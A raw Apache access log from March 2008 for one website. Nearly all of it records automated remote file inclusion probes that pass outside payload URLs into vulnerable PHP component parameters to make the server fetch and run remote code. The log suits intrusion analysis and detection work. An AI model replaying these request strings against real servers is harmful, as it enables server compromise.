216.55.147.205 - - [04/Mar/2008:07:58:08 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.144.109 - - [04/Mar/2008:07:58:20 -0800] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lennoxpetroleum.com/forum/db/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.144.109 - - [04/Mar/2008:07:58:20 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lennoxpetroleum.com/forum/db/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.144.109 - - [04/Mar/2008:07:58:20 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lennoxpetroleum.com/forum/db/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:07:58:25 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:07:58:31 -0800] "GET /index.php?pagina=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:07:58:31 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:07:58:35 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:07:58:36 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:07:58:36 -0800] "GET /logs/index.php?pagina=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:07:58:37 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:07:58:49 -0800] "GET /logs/access_080201.log/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:07:58:53 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.66.202 - - [04/Mar/2008:07:58:59 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.144.109 - - [04/Mar/2008:07:59:17 -0800] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lennoxpetroleum.com/forum/db/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.160.16.3 - - [04/Mar/2008:07:59:23 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.106.251.51 - - [04/Mar/2008:07:59:42 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.106.251.51 - - [04/Mar/2008:07:59:42 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:07:59:42 -0800] "GET /logs/access_080131.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:08:00:03 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.angelfire.com/linux/ryu1/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:08:00:03 -0800] "GET //skin/zero_vote/error.php?dir=http://www.angelfire.com/linux/ryu1/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
80.67.21.65 - - [04/Mar/2008:08:00:03 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:00:05 -0800] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:08:00:05 -0800] "GET //skin/zero_vote/error.php?dir=http://www.angelfire.com/linux/ryu1/b?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:08:00:07 -0800] "GET //skin/zero_vote/error.php?dir=http://www.angelfire.com/linux/ryu1/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:08:00:08 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.angelfire.com/linux/ryu1/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:08:00:26 -0800] "GET /signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:08:00:26 -0800] "GET /logs/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
80.67.21.65 - - [04/Mar/2008:08:00:43 -0800] "GET /logs/access_080119.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:08:01:06 -0800] "GET /logs/access_071224.log//index.php?pageurl=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.58.242.138 - - [04/Mar/2008:08:01:11 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.21.65 - - [04/Mar/2008:08:01:11 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:08:01:11 -0800] "GET /signin.php?_AMGconfig[cfg_serverpath]=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:08:01:12 -0800] "GET /logs/signin.php?_AMGconfig[cfg_serverpath]=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
80.67.21.65 - - [04/Mar/2008:08:01:12 -0800] "GET /logs/access_080103.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:08:01:33 -0800] "GET /logs/access_080122.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pcr.ac.id/~rina/includes/db/new.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:08:01:34 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pcr.ac.id/~rina/includes/db/new.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:08:01:34 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pcr.ac.id/~rina/includes/db/new.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.6.101.22 - - [04/Mar/2008:08:01:59 -0800] "GET /logs/access_080208.log/index.php?body=http://treguonline.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.6.101.22 - - [04/Mar/2008:08:02:00 -0800] "GET /index.php?body=http://treguonline.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.6.101.22 - - [04/Mar/2008:08:02:01 -0800] "GET /logs/index.php?body=http://treguonline.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.86.119 - - [04/Mar/2008:08:02:05 -0800] "GET /logs/access_071224.log//index.php?pageurl=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:08:02:26 -0800] "GET /logs/access_080211.log/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:08:02:26 -0800] "GET /logs/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:02:27 -0800] "GET /logs/access_080126.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:08:02:34 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:08:02:34 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
200.180.216.43 - - [04/Mar/2008:08:02:37 -0800] "GET /logs/access_071224.log//index.php?pageurl=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:02:38 -0800] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:02:38 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:02:39 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:03:00 -0800] "GET /logs/access_071216.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:03:00 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:03:00 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:03:00 -0800] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.125.20.108 - - [04/Mar/2008:08:03:26 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:03:26 -0800] "GET /logs/access_071228.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:03:40 -0800] "GET /logs/access_080101.log//index.php?pageurl=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:03:46 -0800] "GET //index.php?pageurl=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:03:51 -0800] "GET /logs//index.php?pageurl=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.65.34.76 - - [04/Mar/2008:08:04:08 -0800] "GET /logs/?phpbb_root_path=http://suwung.890m.com/test.txt??? HTTP/1.1" 200 37260 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
62.65.34.76 - - [04/Mar/2008:08:04:08 -0800] "GET /?phpbb_root_path=http://suwung.890m.com/test.txt??? HTTP/1.1" 200 3094 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
89.111.176.28 - - [04/Mar/2008:08:04:21 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://onf.no/pics/2008/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [04/Mar/2008:08:04:22 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://onf.no/pics/2008/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:04:25 -0800] "GET /logs/access_080221.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.106.251.51 - - [04/Mar/2008:08:04:53 -0800] "GET /logs/access_080216.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.106.251.51 - - [04/Mar/2008:08:04:53 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.106.251.51 - - [04/Mar/2008:08:04:53 -0800] "GET /logs//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:04:55 -0800] "GET /logs/access_080216.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:04:57 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:04:57 -0800] "GET /logs//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.23.153.242 - - [04/Mar/2008:08:05:17 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://geocities.com/wisnu_amanda/wisnu.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [04/Mar/2008:08:05:27 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.syshd.de/cache/%20%20%20%20%20%20%20/isis.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
194.79.75.195 - - [04/Mar/2008:08:05:27 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.syshd.de/cache/%20%20%20%20%20%20%20/isis.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
89.111.176.28 - - [04/Mar/2008:08:05:33 -0800] "GET /logs/access_080122.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://onf.no/pics/2008/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.106.251.51 - - [04/Mar/2008:08:05:47 -0800] "GET /logs/access_080207.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.69.144.194 - - [04/Mar/2008:08:05:56 -0800] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:06:18 -0800] "GET /logs/access_080207.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.79.75.195 - - [04/Mar/2008:08:06:21 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.syshd.de/cache/%20%20%20%20%20%20%20/isis.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
194.79.75.195 - - [04/Mar/2008:08:06:23 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.syshd.de/cache/%20%20%20%20%20%20%20/isis.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
24.106.251.51 - - [04/Mar/2008:08:06:24 -0800] "GET /logs/access_080216.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.106.251.51 - - [04/Mar/2008:08:06:25 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.106.251.51 - - [04/Mar/2008:08:06:25 -0800] "GET /logs//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:08:06:34 -0800] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.44.108 - - [04/Mar/2008:08:06:36 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.89 - - [04/Mar/2008:08:06:37 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:08:06:37 -0800] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
71.70.134.227 - - [04/Mar/2008:08:07:12 -0800] "GET /logs/access_080208.log/index.php?body=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.70.134.227 - - [04/Mar/2008:08:07:12 -0800] "GET /index.php?body=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.70.134.227 - - [04/Mar/2008:08:07:12 -0800] "GET /logs/index.php?body=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.106.251.51 - - [04/Mar/2008:08:07:14 -0800] "GET /logs/access_080207.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:08:07:22 -0800] "GET /logs/access_080201.log/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.35.39.129 - - [04/Mar/2008:08:07:27 -0800] "GET /logs/access_080122.log/components/com_simpleboard/image_upload.php?sbp=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.39.129 - - [04/Mar/2008:08:07:27 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.19.213 - - [04/Mar/2008:08:07:30 -0800] "GET /logs/access.log/?vsdragonrootpath=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [04/Mar/2008:08:07:30 -0800] "GET /logs/?vsdragonrootpath=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 200 37260 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.66.202 - - [04/Mar/2008:08:08:11 -0800] "GET /logs/access_080216.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.66.202 - - [04/Mar/2008:08:08:11 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.66.202 - - [04/Mar/2008:08:08:11 -0800] "GET /logs//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.70.134.227 - - [04/Mar/2008:08:08:40 -0800] "GET /logs/access_080207.log//include.php?path[docroot]=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.16.3 - - [04/Mar/2008:08:08:51 -0800] "GET /logs/access_080216.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [04/Mar/2008:08:08:52 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [04/Mar/2008:08:08:52 -0800] "GET /logs//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:08:08:59 -0800] "GET /logs///update/update5.php?lang=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:08:08:59 -0800] "GET ///update/update5.php?lang=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
67.18.66.202 - - [04/Mar/2008:08:09:01 -0800] "GET /logs/access_080207.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.35.39.129 - - [04/Mar/2008:08:09:49 -0800] "GET /logs/access_080118.log/components/com_simpleboard/image_upload.php?sbp=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:09:53 -0800] "GET /logs/access_071216.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://webmail.asl3.umbria.it/admin/inc/albania.txt????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:09:55 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://webmail.asl3.umbria.it/admin/inc/albania.txt????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [04/Mar/2008:08:09:55 -0800] "GET /logs/access_080207.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:09:56 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://webmail.asl3.umbria.it/admin/inc/albania.txt????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:10:00 -0800] "GET /logs/access_071228.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://webmail.asl3.umbria.it/admin/inc/albania.txt????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.19.213 - - [04/Mar/2008:08:10:13 -0800] "GET /logs/access_080130.log/?vsdragonrootpath=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.94 - - [04/Mar/2008:08:10:15 -0800] "GET /logs/access.log HTTP/1.0" 200 373420 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:10:16 -0800] "GET /logs/access_080216.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:10:16 -0800] "GET //errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:10:19 -0800] "GET /logs//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [04/Mar/2008:08:10:25 -0800] "GET /logs/access_080216.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
